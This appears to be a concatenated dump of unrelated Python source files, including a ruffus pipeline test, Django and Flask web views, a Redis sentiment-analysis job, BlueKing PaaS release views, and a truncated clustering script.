        with open(tempdir + "/files.split.%s.%03d.fa" % (original_index, i), "w") as oo:
            pass
    with open(success_flag, "w") as oo:
        pass
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
#
# align_sequences
#
@posttask(lambda: sys.stderr.write("\tSequences aligned\n"))
@transform(split_fasta_file, suffix(".fa"), ".aln")     # fa -> aln
def align_sequences (input_file, output_filename):
    # Dummy "alignment": the output just records its own file name.
    with open(output_filename, "w") as oo:
        oo.write("%s\n" % output_filename)
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
#
# percentage_identity
#
@posttask(lambda: sys.stderr.write("\t%Identity calculated\n"))
@transform(align_sequences,      # find all results from align_sequences
           suffix(".aln"),       # replace suffix with:
           [r".pcid",            # .pcid suffix for the result
            r".pcid_success"])   # .pcid_success to indicate job completed
def percentage_identity (input_file, output_files):
    """Dummy per-alignment job producing a result file and a success flag."""
    (output_filename, success_flag_filename) = output_files
    with open(output_filename, "w") as oo:
        oo.write("%s\n" % output_filename)
    with open(success_flag_filename, "w") as oo:
        pass
#88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
#
# combine_results
#
@posttask(lambda: sys.stderr.write("\tResults recombined\n"))
@collate(percentage_identity, regex(r".*files.split\.(\d+)\.\d+.pcid"),
         [tempdir + r"/\1.all.combine_results",
          tempdir + r"/\1.all.combine_results_success"])
def combine_results (input_files, output_files):
    """
    Combine all
    """
    (output_filename, success_flag_filename) = output_files
    with open(output_filename, "w") as out:
        # Each input is a (result, success-flag) pair; only the result file
        # content is concatenated into the combined output.
        for inp, flag in input_files:
            with open(inp) as ii:
                out.write(ii.read())
    with open(success_flag_filename, "w") as oo:
        pass
class Test_ruffus(unittest.TestCase):
    """End-to-end checks of the split/align/collate pipeline, once via the
    decorator API and once via the object-orientated Pipeline API."""

    def setUp(self):
        # Start each test from a clean temp directory with the three inputs.
        import os
        try:
            shutil.rmtree(tempdir)
        except:
            pass
        os.makedirs(tempdir)
        for f in original_files:
            with open(f, "w") as p: pass

    def cleanup_tmpdir(self):
        # Also remove the ruffus checksum/history file so jobs rerun from scratch.
        os.system('rm -f %s %s' % (os.path.join(tempdir, '*'), RUFFUS_HISTORY_FILE))

    #___________________________________________________________________________
    #
    #   test product() pipeline_printout and pipeline_run
    #___________________________________________________________________________
    def test_collate(self):
        self.cleanup_tmpdir()

        s = StringIO()
        # Dry run: the printout must report jobs as needing an update.
        pipeline_printout(s, [combine_results], verbose=5, wrap_width = 10000, pipeline= "main")
        self.assertTrue(re.search('Job needs update:.*Missing files.*', s.getvalue(), re.DOTALL) is not None)
        #print s.getvalue()

        pipeline_run([combine_results], verbose=0, pipeline= "main")

    def test_newstyle_collate (self):
        """
        As above but create pipeline on the fly using object orientated syntax rather than decorators
        """

        #
        # Create pipeline on the fly, joining up tasks
        #
        test_pipeline = Pipeline("test")
        test_pipeline.originate(task_func = generate_initial_files,
                                output = original_files)\
            .mkdir(tempdir, tempdir+"/test")

        test_pipeline.subdivide( task_func = split_fasta_file,
                                 input = generate_initial_files,
                                 filter = regex(r".*\/original_(\d+).fa"),                   # match original files
                                 output = [tempdir + r"/files.split.\1.success",             # flag file for each original file
                                           tempdir + r"/files.split.\1.*.fa"],               # glob pattern
                                 extras = [r"\1"])\
            .posttask(lambda: sys.stderr.write("\tSplit into %d files each\n" % JOBS_PER_TASK))

        test_pipeline.transform(task_func = align_sequences,
                                input = split_fasta_file,
                                filter = suffix(".fa"),
                                output = ".aln") \
            .posttask(lambda: sys.stderr.write("\tSequences aligned\n"))

        test_pipeline.transform(task_func = percentage_identity,
                                input = align_sequences,             # find all results from align_sequences
                                filter = suffix(".aln"),             # replace suffix with:
                                output = [r".pcid",                  # .pcid suffix for the result
                                          r".pcid_success"]          # .pcid_success to indicate job completed
                                )\
            .posttask(lambda: sys.stderr.write("\t%Identity calculated\n"))

        test_pipeline.collate(task_func = combine_results,
                              input = percentage_identity,
                              filter = regex(r".*files.split\.(\d+)\.\d+.pcid"),
                              output = [tempdir + r"/\1.all.combine_results",
                                        tempdir + r"/\1.all.combine_results_success"])\
            .posttask(lambda: sys.stderr.write("\tResults recombined\n"))

        #
        # Cleanup, printout and run
        #
        self.cleanup_tmpdir()
        s = StringIO()
        test_pipeline.printout(s, [combine_results], verbose=5, wrap_width = 10000)
        self.assertTrue(re.search('Job needs update:.*Missing files.*', s.getvalue(), re.DOTALL) is not None)
        test_pipeline.run(verbose=0)

    #___________________________________________________________________________
    #
    #   cleanup
    #___________________________________________________________________________
    def tearDown(self):
        shutil.rmtree(tempdir)
#
# Necessary to protect the "entry point" of the program under windows.
# see: http://docs.python.org/library/multiprocessing.html#multiprocessing-programming
#
if __name__ == '__main__':
unittest.main()
|
python
|
from django.views.generic import View
from core.models import Cardapio
from django.shortcuts import render
from core.outros.categoriasCardapio import categoriasCardapio
import json
class CardapioView(View):
    """Render the menu page.

    Without a ``categoria`` query parameter it shows the category overview;
    with one it shows that category's dishes arranged in rows of three, and
    optionally adds an item to the session cart when ``item_adicionado``/``id``
    are present.
    """

    def get(self, request, *args, **kwargs):
        categoria = request.GET.get('categoria')
        item_adicionado = request.GET.get('item_adicionado')
        item_id = request.GET.get('id')  # renamed from `id` to avoid shadowing the builtin
        carrinho = []
        # The cart is stored in the session as a JSON string.
        if request.session.get('carrinho'):
            carrinho = json.loads(request.session['carrinho'])
        if categoria is None:
            # No category selected: show the category overview.
            context = {
                'categoriasCardapio': categoriasCardapio,
                'carrinhoTamanho': len(carrinho),
            }
            return render(request, 'core/cardapio.html', context)
        else:
            pratosQuery = Cardapio.objects.filter(categoria=categoria)
            # Build a matrix (rows of 3 dishes) for template rendering.
            cardapioCatArray = []
            arrayLinha = []
            indexColeta = 2
            for i in range(len(pratosQuery)):
                if i <= indexColeta:
                    arrayLinha.append(pratosQuery[i])
                if i == indexColeta:
                    # BUG FIX: was cardapioCatArray.push(...) — Python lists
                    # have no push() method, which raised AttributeError.
                    cardapioCatArray.append(arrayLinha)
                    arrayLinha = []
                    indexColeta += 3
            # Flush the final, possibly partial, row.
            if len(arrayLinha) > 0:
                cardapioCatArray.append(arrayLinha)
            if item_adicionado is not None:
                # Append the selected dish to the session cart.
                itemCardapio = Cardapio.objects.get(id=item_id)
                item = {
                    'id': str(itemCardapio.id),
                    'nome': str(itemCardapio.nome),
                    'fotoUrl': str(itemCardapio.foto.url),
                    'valor': str(itemCardapio.valor),
                    'descricao': str(itemCardapio.descricao),
                }
                carrinho.append(item)
                carrinhoJSON = json.dumps(carrinho)
                request.session['carrinho'] = carrinhoJSON
            context = {
                'categoria': categoria,
                'pratos': cardapioCatArray,
                'item_adicionado': item_adicionado,
                'carrinhoTamanho': len(carrinho),
            }
            return render(request, 'core/cardapio.html', context)
|
python
|
import argparse
import logging
import os
from sentiment_analysis.src.managers.survey_replies_manager import SurveyRepliesManager
from utils.data_connection.api_data_manager import APISourcesFetcher
from utils.data_connection.source_manager import Connector
from utils.gcloud.nlp_client import NLPGoogleClient
from utils.utilities import get_last_week, create_list_weeks_years, extract_first_last_weeks, custom_year_week_format
from google.cloud.language_v1 import LanguageServiceClient
from utils.data_connection.factory.redis_factory import RedisFactory
from utils.data_connection.redis_manager import RedisManager
from nested_lookup import nested_lookup
logger = logging.getLogger()
def inject_year_week_sentiment_analysis(db_connector: Connector,
                                        google_client: LanguageServiceClient,
                                        redis_manager: RedisManager,
                                        list_week_year: list,
                                        company_id: str) -> dict:
    """
    Inject the week/year to surveys replies manager
    :param db_connector: connector
    :param google_client: google client
    :param redis_manager: redis manager
    :param list_week_year: list of weeks years
    :param company_id: company target
    :return: the processed sentiment-analysis results from the manager
    """
    # Derive the inclusive [start, end] period from the week/year list.
    week_s, year_s, week_e, year_e = extract_first_last_weeks(list_week_year)
    period = {"start_year": year_s,
              "start_week": week_s,
              "end_year": year_e,
              "end_week": week_e}
    survey_replies_manager = SurveyRepliesManager(api_manager=APISourcesFetcher(db_connector=db_connector),
                                                  google_client=google_client,
                                                  redis_manager=redis_manager,
                                                  period=period,
                                                  company_ids=[company_id])
    survey_replies_manager.fetch_data()
    # Scores only: skip any non-score post-processing of the replies.
    survey_replies_manager.process_replies(process_scores_only=True)
    return survey_replies_manager.get_results()
def persist_result_redis(company_id: str, processing_result: dict, redis_manager) -> None:
    """
    Write the dictionary into redis
    :param company_id: str of company id
    :param redis_manager: redis manager
    :param processing_result: dict to persist into redis
    :return:
    """
    redis_score_field = "score"
    # Empty data
    if not processing_result:
        logger.warning(msg="No data to be persisted in Redis.")
        return
    existing_scores = redis_manager.retrieve(key=company_id,
                                             field=redis_score_field)
    new_scores = nested_lookup(redis_score_field, processing_result[company_id])
    # Append the freshly processed scores to whatever was already stored.
    redis_manager.persist(key=company_id,
                          field=redis_score_field,
                          data=existing_scores + new_scores)
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Extract surveys replies from DB and inject to REDIS')
    parser.add_argument('--year', help='year of the survey')
    parser.add_argument('--week', help='week of the survey')
    parser.add_argument("--number_week_to_insert", help="number of week to agglomerate", default=1)
    parser.add_argument('--company_id', help='target company id', required=True)
    args = parser.parse_args()
    target_year = args.year
    target_week = args.week
    number_week_to_insert = args.number_week_to_insert
    company_id = args.company_id
    # Default to the most recently completed week when not specified.
    if target_week is None or target_year is None:
        target_year, target_week = get_last_week()
    # DB credentials come from the environment.
    connector = Connector(os.getenv("DB_USER"),
                          os.getenv("DB_PASSWORD"),
                          os.getenv("DB_HOST"),
                          os.getenv("DB_PORT"))
    g_client = NLPGoogleClient.open_client()
    list_week_year = create_list_weeks_years(week=int(target_week),
                                             year=int(target_year),
                                             number_weeks_analyze=int(number_week_to_insert))
    weeks = custom_year_week_format(year_weeks=list_week_year)
    redis_manager = RedisFactory.build()
    processing_result = inject_year_week_sentiment_analysis(db_connector=connector,
                                                            google_client=g_client,
                                                            redis_manager=redis_manager,
                                                            list_week_year=list_week_year,
                                                            company_id=company_id)
    persist_result_redis(company_id=company_id,
                         redis_manager=redis_manager,
                         processing_result=processing_result)
|
python
|
import numpy as np
import os
# Path to the CMIP6 solar forcing table shipped alongside this module.
forcing_filename = os.path.join(os.path.dirname(__file__), 'cmip6_solar.csv')
class Forcing:
    # NOTE: the CSV is parsed once, at class-definition (import) time; the
    # first 7 lines are header metadata.
    forcing = np.loadtxt(forcing_filename, skiprows=7, delimiter=',')
    # Column 0: year of the record.
    year = forcing[:,0]
    # Column 1: solar forcing value -- units per the CSV header; confirm against cmip6_solar.csv.
    solar = forcing[:,1]
|
python
|
import os
import numpy as np
from play_model import PlayModel
class PlayAgent:
    """Thin agent wrapper around a PlayModel that picks the argmax-Q action."""

    def __init__(self, params):
        self.parameters = params
        # Reduce log output for tensorflow before the model spins up.
        os.environ['TF_CPP_MIN_LOG_LEVEL'] = str(self.parameters['tf_log_level'])
        self.model = PlayModel(self.parameters)

    def get_action(self, state):
        """Return the index of the highest-valued action for *state*."""
        q_values = self.model.predict([state])
        return np.argmax(q_values)

    def __enter__(self):
        # BUG FIX: previously returned None, so `with PlayAgent(...) as agent`
        # bound agent to None. Enter the model's context and return self.
        self.model.__enter__()
        return self

    def __exit__(self, ty, value, tb):
        # BUG FIX: previously a no-op, so the model context entered in
        # __enter__ was never exited. Delegate so the model can clean up.
        return self.model.__exit__(ty, value, tb)
|
python
|
import pytest
import asyncio
from async_v20.client import OandaClient
# BUG FIX: pytest.yield_fixture is deprecated and removed in modern pytest;
# plain pytest.fixture has supported yield-style teardown since pytest 3.0.
@pytest.fixture
# NOTE(review): marks applied to fixtures are generally no-ops; an async
# fixture normally needs pytest_asyncio's fixture support -- confirm setup.
@pytest.mark.asyncio
async def client():
    """Yield an OandaClient wired to the local test server; close it on teardown."""
    oanda_client = OandaClient(rest_host='127.0.0.1', rest_port=8080, rest_scheme='http',
                               stream_host='127.0.0.1', stream_port=8080, stream_scheme='http',
                               health_host='127.0.0.1', health_port=8080, health_scheme='http')
    yield oanda_client
    # Teardown: close the client and let pending callbacks run once.
    await oanda_client.close()
    await asyncio.sleep(0)
|
python
|
"""
Defines the blueprint for the auth
"""
import uuid
import datetime
from flasgger import swag_from
from flask import Blueprint, request
from flask.json import jsonify
from flask_bcrypt import generate_password_hash, check_password_hash
from flask_jwt_extended import (create_access_token, get_jwt_identity)
from repositories import AuthRepository, UserRepository
AUTH_BLUEPRINT = Blueprint("auth", __name__)
@AUTH_BLUEPRINT.route('/auth', methods=['POST'])
@swag_from("../swagger/auth/POST.yml")
def create():
    """Authenticate a user, creating the account on first login.

    Expects a JSON body with "username" and "password". Unknown usernames are
    registered (auth record + bare user profile); known usernames have their
    password checked. Returns JSON with an access token on success.
    """
    body = request.get_json()
    auth = AuthRepository.getByUsername(body["username"].lower())
    if not auth:
        # First login: register credentials and a bare user profile.
        pw_hash = generate_password_hash(body["password"], 10)
        auth = AuthRepository.create(
            body["username"].lower(), pw_hash
        )
        UserRepository.create(
            body["username"], None, None
        )
        # NOTE(review): the token is created with the JWT default lifetime;
        # the duplicated `expires = datetime.timedelta(days=1)` locals were
        # dead code (never passed as expires_delta) and have been removed.
        # TODO(review): unlike the login path below, registration does not
        # persist the token via AuthRepository.updateToken -- confirm intended.
        access_token = create_access_token(identity = { "username": auth.username, "id": auth.id })
        response = jsonify({"success": True, "access_token": access_token})
        response.status_code = 200
        return response
    validatePassword = check_password_hash(auth.password, body["password"])
    if not validatePassword:
        # Invalid credentials intentionally return HTTP 200 with success=False.
        response = jsonify({"success": False, "message": "Invalid username or password"})
        response.status_code = 200
        return response
    access_token = create_access_token(identity = { "username": auth.username, "id": auth.id })
    AuthRepository.updateToken(id=auth.id, token=access_token)
    response = jsonify({"success": True, "access_token": access_token })
    response.status_code = 200
    return response
|
python
|
import numpy as np
def main():
    """Demonstrate a 3-D grid index <-> linear index round trip (2x3x4 grid)."""
    nx = 2
    ny = 3
    nz = 4

    def do_it(i):
        # Decompose linear index i into (x, y, z) grid coordinates.
        # (// keeps the integer-division semantics of the original Python 2 code)
        return [i % nx, (i // nx) % ny, i // (nx * ny)]

    def undo_it(x, y, z):
        # BUG FIX: the stride of z is nx*ny, not nx*nx. The old formula
        # nx * ((nx * z) + y) + x only inverted do_it when nx == ny;
        # the correct inverse is x + nx*y + nx*ny*z.
        return x + nx * (y + ny * z)

    for i in range(nx * ny * nz):
        xyz = do_it(i)
        print('{}: {}'.format(i, xyz))
        uuzz = np.array(xyz)
        print('{}: {}'.format(i, undo_it(*uuzz)))


main()
|
python
|
import utils
import euclides
def esCarmichael(p):
    """Return True if p is a Carmichael number, False otherwise.

    Precondition: p > 0.
    Checks Fermat's little theorem for every base i coprime with p, then
    verifies p is squarefree with at least 3 prime factors (Korselt-style).
    """
    i = 1
    while i < p:
        if euclides.sonCoprimers(i, p):
            # A coprime base failing Fermat's test rules out Carmichael.
            if utils.potencia_modular_eficient(i, p-1, p) != 1:
                return False
        i += 1
    if i == p:
        # All coprime bases passed; require squarefree with >= 3 prime factors.
        s = utils.factors_primers(p)
        if len(set(s)) == len(s) and len(s) >= 3:
            return True
    return False
|
python
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
""" # noqa
from __future__ import unicode_literals
import datetime
import json
from django.conf import settings
from django.http import JsonResponse
from django.views.generic import View
from app.models import App, SecureInfo
from common.constants import ModeEnum, ModeNameDict
from common.exceptions import BadRequestException
from common.log import logger
from common.mixins.base import AppDeveloperRequiredMixin
from common.responses import FailJsonResponse, OKJsonResponse
from common.views.mako import JsonView, MakoTemplateView
from components.engine import get_event_log
from engine.deploy import (app_to_offline_task, app_to_online_task,
app_to_test_task)
from engine.models import BkServer, ThirdServer
from release.constants import (APP_DID_OPERATE_ID_LIST, OPERATE_CODE_LIST, EventStatusEnum,
OperateIDEnum, UserOperateTypeEnum, DeployPageTypeEnum)
from release.models import Record, Version
from release.utils import get_event_status, get_release_home_page_data
from release.utils import record_user_release_operate as _r
class HomeView(AppDeveloperRequiredMixin, MakoTemplateView):
    """Release & deploy - landing page."""
    template_name = 'release/home.html'

    def get_context_data(self, **kwargs):
        """Fill the template context with the release home-page data."""
        context = super(HomeView, self).get_context_data(**kwargs)
        app_code = self.kwargs["app_code"]
        page_data = get_release_home_page_data(app_code, self.request.user.username)
        context.update(page_data)
        return context
class RecordPageView(AppDeveloperRequiredMixin, MakoTemplateView):
    """Release-record history page."""
    template_name = 'release/record.html'

    def get_context_data(self, **kwargs):
        context = super(RecordPageView, self).get_context_data(**kwargs)
        context.update({"app_code": self.kwargs["app_code"], "tab": "record"})
        return context
class AppRecordView(AppDeveloperRequiredMixin, MakoTemplateView):
    """Render the release-record list fragment.

    operate_code filters by operation ID: 0: all, 1: deploy-to-test,
    2: go online, 3: take offline.
    """
    template_name = 'release/record_list.part'
    def get_context_data(self, **kwargs):
        context = super(AppRecordView, self).get_context_data(**kwargs)
        app_code = self.kwargs["app_code"]
        operate_code = self.kwargs["operate_code"]
        if operate_code not in OPERATE_CODE_LIST:
            raise BadRequestException("operate_code is invalid")
        # Only the 100 most recent records are shown.
        query = Record.objects.query_records(app_code, operate_code, size=100)
        record_list = []
        for _record in query:
            # Extra display info attached to the record (task details, mode).
            extra_data = _record.get_extra_data()
            if not extra_data:
                task_detail = ''
                extra_msg = '--'
            else:
                task_detail = extra_data.get("task_detail", "")
                if _record.operate_id in [OperateIDEnum.IN_OFFLINE.value, OperateIDEnum.TO_OFFLINE.value]:
                    # For offline operations show which environment was taken down.
                    _extra_data_mode = extra_data.get("mode", ModeEnum.ALL.value)
                    _env = ModeNameDict.get(_extra_data_mode, "--")
                    extra_msg = "选择下架环境:{}".format(_env)
                else:
                    extra_msg = "--"
            is_done = _record.operate_id in APP_DID_OPERATE_ID_LIST
            record_list.append({
                "operate_type": _record.get_operate_id_display(),
                "operate_user": _record.operate_user,
                "is_success": _record.is_success,
                "is_done": is_done,
                "operate_time": _record.operate_time_display,
                "extra_data": extra_msg,
                "detail": _record.message.replace('\n', '<br/>') if _record.message else "没有返回信息!",
                "task_detail": task_detail
            })
        context.update({
            "record_list": record_list,
            "app_code": app_code,
        })
        return context
class ReleaseVersion(AppDeveloperRequiredMixin, MakoTemplateView):
    """Version info page: an app's historical released versions."""
    template_name = 'release/version.html'

    def get_context_data(self, **kwargs):
        context = super(ReleaseVersion, self).get_context_data(**kwargs)
        app_code = self.kwargs["app_code"]
        application = App.objects.get(code=app_code)
        context.update({
            "app_code": app_code,
            "version_list": Version.objects.get_version_list(application),
            "tab": "version",
        })
        return context
class DeployPageView(AppDeveloperRequiredMixin, MakoTemplateView):
    """Build the context for one deploy page fragment (per page_type)."""

    def get_template_names(self):
        # Template fragment is selected by the page_type URL kwarg.
        return ["release/{}.part".format(self.kwargs["page_type"])]

    def get_context_data(self, **kwargs):
        context = super(DeployPageView, self).get_context_data(**kwargs)
        app_code = self.kwargs["app_code"]
        page_type = self.kwargs["page_type"]
        application = App.objects.get(code=app_code)
        vcs_info = SecureInfo.objects.get_vcs_info(app_code)
        payload = {"app": application,
                   "vcs_url": vcs_info.get("VCS_PATH") if vcs_info else '--',
                   "app_code": app_code,
                   }
        # The test-deploy page additionally shows RabbitMQ availability.
        if page_type == DeployPageTypeEnum.TEST.value:
            payload.update({"is_service_rabbitmq_active": ThirdServer.objects.is_rabbitmq_active()})
        context.update(payload)
        return context
class ReleaseTestView(AppDeveloperRequiredMixin, View):
    """Deploy an app to the test environment ("提测")."""

    def post(self, request, *args, **kwargs):
        app_code = self.kwargs["app_code"]
        username = request.user.username
        logger.info("[app:%s] 开始进行[测试部署]...", app_code)
        app = App.objects.get(code=app_code)
        # A test server must be registered and active before deploying.
        is_test_app_deployable = BkServer.objects.check_test_app_deployable()
        if not is_test_app_deployable:
            message = "当前没有可用的[测试服务器], 无法进行提测操作. 请到<a href='/engine/server/'> [开发者中心-服务器信息] </a> 注册并激活服务器"
            logger.info("[app:%s] %s", app_code, message)
            return FailJsonResponse(message)
        # Only apps in offline/dev/test/online states may be deployed to test.
        can_be_test, message = app.can_be_test()
        if not can_be_test:
            logger.info("[app:%s] %s", app_code, message)
            return FailJsonResponse(message)
        # Optional services (celery / celery beat) toggled from the form.
        form_data = request.POST.get("form_data", None)
        if form_data:
            try:
                form_data = json.loads(request.POST.get("form_data"))
            except Exception as e:
                message = "参数错误!"
                logger.exception("[app:%s] %s error=%s", app_code, message, str(e))
                # BUG FIX: the exception instance was previously *returned*
                # instead of raised, handing the framework a non-response
                # object; raise it like the sibling views (cf. AppRecordView).
                raise BadRequestException(message)
            is_use_celery = (form_data.get("is_use_celery") == "checked")
            is_use_celery_beat = (form_data.get("is_use_celery_beat") == "checked")
            try:
                app.trigger_celery(is_use_celery, is_use_celery_beat)
                logger.info("update app info [is_use_celery=%s, is_use_celery_beat=%s]",
                            app.is_use_celery, app.is_use_celery_beat)
            except Exception:
                logger.exception("Update is_use_celery/is_use_celery_beat fail!")
        # Kick off the test-deploy task.
        ok, event_id, message = app_to_test_task(app_code, app, username)
        # Audit trail of the user operation.
        extra_data = {"username": username, "is_success": ok, "event_id": event_id}
        _r(app_code, username, UserOperateTypeEnum.RELEASE_TEST.value, extra_data)
        if ok:
            message = "测试部署事件提交成功!"
            logger.info("[app:%s] %s event_id: %s", app_code, message, event_id)
            return OKJsonResponse(message, event_id=event_id)
        logger.info("[app:%s] %s event_id: %s", app_code, message, event_id)
        return FailJsonResponse(message, event_id=event_id)
class ReleaseProductionView(AppDeveloperRequiredMixin, View):
    """Deploy an app to production ("上线")."""

    def post(self, request, *args, **kwargs):
        app_code = self.kwargs["app_code"]
        username = request.user.username
        logger.info("[app:%s] 开始进行[正式部署]...", app_code)
        app = App.objects.get(code=app_code)
        try:
            form_data = json.loads(request.POST.get("form_data", '{}'))
        except Exception as e:
            message = "参数错误!"
            logger.exception("[app:%s] %s error=%s", app_code, message, e)
            # BUG FIX: raise the exception instead of returning the instance
            # (a view must return an HttpResponse; cf. AppRecordView's raise).
            raise BadRequestException(message)
        is_prod_app_deployable = BkServer.objects.check_prod_app_deployable()
        if not is_prod_app_deployable:
            message = "当前没有可用的[正式服务器], 无法进行提测操作. 请到<a href='/engine/server/'> [开发者中心-服务器信息] </a> 注册并激活服务器"
            logger.info("[app:%s] %s", app_code, message)
            return FailJsonResponse(message)
        # Pull only the expected fields out of the client-side form data.
        is_tips = form_data.get("is_tips", 0)
        features = form_data.get("features", "")
        bugs = form_data.get("bugs", "")
        can_be_online, message = app.can_be_online()
        if not can_be_online:
            logger.info("[app:%s] %s", app_code, message)
            return FailJsonResponse(message)
        # Kick off the go-online task.
        ok, event_id, message = app_to_online_task(app_code, app, username, is_tips, features, bugs)
        # Audit trail of the user operation.
        extra_data = {"username": username, "form_data": form_data}
        _r(app_code, username, UserOperateTypeEnum.RELEASE_ONLINE.value, extra_data)
        if not ok:
            logger.info("[app:%s] %s event_id: %s", app_code, message, event_id)
            return FailJsonResponse(message, event_id=event_id)
        message = "正式部署事件提交成功!"
        logger.info("[app:%s] %s event_id: %s", app_code, message, event_id)
        return OKJsonResponse(message, event_id=event_id)
class ReleaseOfflineView(AppDeveloperRequiredMixin, MakoTemplateView):
    """Take an app offline ("下架").

    GET renders the offline landing page; POST performs the offline operation.
    """
    template_name = 'release/home.html'

    def get_context_data(self, **kwargs):
        context = super(ReleaseOfflineView, self).get_context_data(**kwargs)
        request = self.request
        app_code = self.kwargs["app_code"]
        username = request.user.username
        data = get_release_home_page_data(app_code, username, page="unrelease")
        context.update(data)
        return context

    def post(self, request, *args, **kwargs):
        app_code = self.kwargs["app_code"]
        username = request.user.username
        logger.info("[app:%s] 开始进行[下架]...", app_code)
        try:
            form_data = json.loads(request.POST.get("form_data", '{}'))
        except Exception:
            message = "参数错误!"
            logger.exception("[app:%s] %s", app_code, message)
            # BUG FIX: raise the exception instead of returning the instance
            # (a view must return an HttpResponse; cf. AppRecordView's raise).
            raise BadRequestException(message)
        # No server-availability check here: an app that was already deployed
        # can always be taken down.
        app = App.objects.get(code=app_code)
        # State check for the requested environment ("all" by default).
        mode = form_data.get("mode", "all")
        can_be_offline, message = app.can_be_offline(mode)
        if not can_be_offline:
            logger.info("[app:%s] %s", app_code, message)
            return FailJsonResponse(message)
        # Run the offline task.
        app_old_state = app.state
        auth_token = app.auth_token
        ok, event_id = app_to_offline_task(app_code, auth_token, username, mode, app_old_state)
        # Audit trail of the user operation.
        extra_data = {"username": username, "form_data": form_data}
        _r(app_code, username, UserOperateTypeEnum.RELEASE_OFFLINE.value, extra_data)
        if ok:
            message = "下架事件提交成功!"
            logger.info("[app:%s] %s event_id: %s", app_code, message, event_id)
            return OKJsonResponse(message, event_id=event_id)
        message = "下架事件提交失败!"
        logger.info("[app:%s] %s event_id: %s", app_code, message, event_id)
        return FailJsonResponse(message, event_id=event_id)
class ApplicationDeleteView(AppDeveloperRequiredMixin, View):
    """Delete an application along with its secure info, keeping an audit trail."""
    def post(self, request, *args, **kwargs):
        app_code = self.kwargs["app_code"]
        logger.info("[app:%s] 开始进行[删除]...", app_code)
        username = request.user.username
        app = App.objects.get(code=app_code)
        can_be_deleted, message = app.can_be_deleted(username)
        if not can_be_deleted:
            logger.info("[app:%s] %s", app_code, message)
            return FailJsonResponse(message)
        try:
            SecureInfo.objects.filter(app_code=app_code).delete()
            App.objects.filter(code=app_code).delete()
            # Mark old release records as version 'last' so a future app with
            # the same code does not clash with the old history.
            Record.objects.filter(app_code=app_code).update(version='last')
        except Exception:
            message = "删除失败!"
            logger.exception("[app:%s] %s", app_code, message)
            return FailJsonResponse(message)
        # Audit trail of the user operation.
        extra_data = {"username": username}
        _r(app_code, username, UserOperateTypeEnum.APP_DELETE.value, extra_data)
        message = "删除成功!"
        logger.info("[app:%s] %s", app_code, message)
        return OKJsonResponse(message)
class EventStatusView(AppDeveloperRequiredMixin, View):
    """Poll the status of a deploy event (test / online / offline).

    result: 0 = failed, 1 = succeeded, 2 = still running.
    """
    def get(self, request, *args, **kwargs):
        app_code = self.kwargs["app_code"]
        event_id = request.GET.get("event_id", '')
        ok, message, data = get_event_status(event_id, app_code, request=request)
        payload = {"result": ok, "message": message, "data": data}
        return JsonResponse(payload)
class UnfinishedTaskView(AppDeveloperRequiredMixin, View):
    """Query the app engine and refresh the status of the latest (up to 10)
    unfinished tasks for an app."""
    def get(self, request, *args, **kwargs):
        app_code = self.kwargs["app_code"]
        app = App.objects.get(code=app_code)
        records = Record.objects.get_last_ongoing_records(app_code, size=10)
        for record in records:
            event_id = record.event_id
            event_ids = [event_id]
            if record.operate_id == OperateIDEnum.IN_OFFLINE.value:
                # Offline operations may bundle several engine events.
                try:
                    event_ids = json.loads(record.extra_data).get("event_ids", [])
                except Exception:
                    event_ids = [event_id]
            ok, data = get_event_log(app_code=app_code, auth_token=app.auth_token, event_ids=event_ids)
            if not ok:
                continue
            status = data.get("status")
            # Events older than the configured expiry that have not succeeded
            # are treated as failed.
            expire_seconds = (datetime.datetime.now() - record.operate_time).total_seconds()
            if (expire_seconds > settings.HISTORY_EVENT_STATE_EXPIRE_SECONDS
                    and status != EventStatusEnum.SUCCESS.value):
                message = "check_unfinished_task, 事件超时({}s), 设置为失败".format(settings.HISTORY_EVENT_STATE_EXPIRE_SECONDS)  # noqa
                logger.info("[app:%s] %s, event_id:%s", app_code, message, event_id)
                record.message = message
                status = EventStatusEnum.FAILURE.value
            if status in (EventStatusEnum.SUCCESS.value, EventStatusEnum.FAILURE.value):
                record.is_success = (status == EventStatusEnum.SUCCESS.value)
                # Map transient IN_* states to their terminal TO_* states.
                to_operate_id = {OperateIDEnum.IN_TEST.value: OperateIDEnum.TO_TEST.value,
                                 OperateIDEnum.IN_ONLINE.value: OperateIDEnum.TO_ONLINE.value,
                                 OperateIDEnum.IN_OFFLINE.value: OperateIDEnum.TO_OFFLINE.value
                                 }.get(record.operate_id, record.operate_id)
                record.operate_id = to_operate_id
                record.save()
        return OKJsonResponse("success")
class LastReleaseRecordView(AppDeveloperRequiredMixin, JsonView):
    """Return the newest deploy record so a reloaded page can resume polling."""

    def get_context_data(self, **kwargs):
        context = super(LastReleaseRecordView, self).get_context_data(**kwargs)
        app_code = self.kwargs["app_code"]
        try:
            # The newest record in one of the in-flight states is the one to poll.
            newest = Record.objects.get_app_newest_record(app_code)
            payload = {
                "record_id": newest.id,
                "event_id": newest.event_id,
            }
        except Exception:
            message = "[app:{}] {}".format(app_code, "get_last_release_record 查询错误!")
            logger.exception(message)
            context.update({
                "result": False,
                "message": message,
                "data": {}
            })
            return context
        context.update({
            "result": True,
            "message": "success",
            "data": payload
        })
        return context
|
python
|
#!/usr/bin/env python
# -*- coding: utf8
from __future__ import print_function, division
from pyksc import dist
import glob
import numpy as np
import os
import plac
import sys
def main(tseries_fpath, in_folder):
    """Measure cross-fold agreement of KSC cluster assignments.

    For every pair of folds, clusters are matched by (rolling) distance
    between centroids. Series that land in the closest matched cluster
    count as agreement; series in any other cluster count as disagreement.
    """
    ids = []
    with open(tseries_fpath) as tseries_file:
        for l in tseries_file:
            ids.append(l.split()[0])
    ids = np.array(ids)

    folders = glob.glob(os.path.join(in_folder, 'fold-*/ksc'))
    num_folders = len(folders)

    agree = 0
    diff = 0
    # BUG FIX: xrange does not exist on Python 3; the module already opts into
    # py3 semantics via __future__ imports, so use range (works on both).
